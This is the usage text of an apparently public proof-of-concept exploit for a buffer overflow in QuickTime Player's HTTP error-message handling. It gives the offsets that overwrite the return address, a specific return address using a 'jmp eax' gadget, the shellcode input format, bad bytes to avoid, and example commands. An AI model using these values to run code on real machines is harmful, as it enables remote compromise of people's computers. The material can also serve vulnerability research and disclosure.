Quicktime Player <= 18.104.22.168 HTTP error message buffer-overflow 0.1
by Luigi Auriemma
e-mail: [email protected]
Usage: quicktimebof.exe <offset> <retaddr> <shellcode>
- offset is the offset in the error messsage (so "HTTP/1.1 404" excluded) which
will overwrite the return address, if in doubt try with 1926, 2134, 1870 and
so on (this offset seems to change depending by the URL or the QTL file)
- retaddr is the return address you want to overwrite, a good value is
0x675b29eb because when the function returns, EAX will point to the previous
offset. 0x675b29eb has a "jmp eax" so the code flow will continue where are
located the bytes of our return address "eb 29" which means "jmp 0x29".
the tool will automatically fill this "space" if retaddr finishes with 0xeb
- shellcode is a file containing the C-style shellcode you want to execute
(so something like "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9... and so on)
remember that the only bytes which must be avoided are 0x00 0x0d 0x0a
use "" to skip the usage of a shellcode
quicktimebof 2134 0x41414141 ""
quicktimebof 2134 0x675b29eb shellcode.txt
Remember that your ports 554 and 7070 must be closed and non-filtered!